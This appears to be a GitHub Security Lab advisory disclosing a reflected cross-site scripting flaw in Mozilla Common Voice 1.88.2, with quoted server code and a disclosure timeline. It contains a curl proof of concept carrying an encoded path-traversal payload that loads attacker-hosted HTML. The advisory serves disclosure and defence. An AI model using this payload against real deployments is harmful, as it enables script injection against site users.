Headline
CVE-2023-42808: GHSL-2023-026: Cross-site scripting (XSS) in Common Voice - CVE-2023-42808
Common Voice is the web app for Mozilla Common Voice, a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools. Version 1.88.2 is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request). This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin. As of time of publication, it is unknown whether any patches or workarounds exist.
Coordinated Disclosure Timeline
- 2023-02-09: Report sent to [email protected]
- 2023-02-13: Report is acknowledged
- 2023-02-13: Mozilla security team suggests a fix
- 2023-02-13: Reporter agrees on the fix
- 2023-03-20: Security Lab asks for an update
- 2023-05-09: Security Lab asks for an update
- 2023-05-11: Deadline expires
Summary
Common Voice is vulnerable to Cross-Site Scripting (XSS).
Product
Common Voice
Tested Version
release-v1.88.2
Details****Issue: User-controlled data used in path expression in fetchLegalDocument (GHSL-2023-026)
Common Voice is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request).
// https://github.com/mozilla/common-voice/blob/9d6ffd755e29b81918b86b9f5218b9c27d9c1c1a/server/src/server.ts#L214
private setupPrivacyAndTermsRoutes() {
this.app.get(
'/privacy/:locale.html',
async ({ params: { locale } }, response) => {
response.send(await fetchLegalDocument('privacy_notice', locale));
}
);
setupPrivacyAndTermsRoutes takes locale and passes it to fetchLegalDocument.
// https://github.com/mozilla/common-voice/blob/9d6ffd755e29b81918b86b9f5218b9c27d9c1c1a/server/src/fetch-legal-document.ts#LL21-L62C2
export default async function fetchLegalDocument(
name: string,
locale: string
): Promise<string> {
...
const legalLocale = localeMapping[locale] ?? locale;
const [status, text] = await request({
uri: `https://raw.githubusercontent.com/mozilla/legal-docs/master/${legalLocale}/common_voice_${name}.md`,
resolveWithFullResponse: true,
})
.then((response: any) => [response.statusCode, response.body])
.catch(response => [response.statusCode, null]);
if (status >= 400 && status < 500) {
...
} else if (status < 300) {
textHTML = new commonmark.HtmlRenderer().render(
new commonmark.Parser().parse(
// There's a parseable datetime string in the legal documents, which we don't need to show
(text as string).replace(/{:\sdatetime=".*" }/, '')
)
);
}
...
return textHTML;
}
fetchLegalDocument retrieves a file including the provided locale in the path, allowing an attacker to provide …/ to traverse into another repository like …/…/…/jorgectf-testing/poc/main/poc.html#.
Proof of Concept
curl '127.0.0.1:9000/privacy/..%2f..%2f..%2fjorgectf-testing%2fpoc%2fmain%2fpoc.html%23.html'
Impact
This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin.
Resources
CodeQL for JavaScript - Uncontrolled data used in path expression
OWASP - Cross Site Scripting (XSS)
CVE-2023-42808
Credit
This issue was discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).
You can contact the GHSL team at [email protected], please include a reference to GHSL-2023-026 in any communication regarding this issue.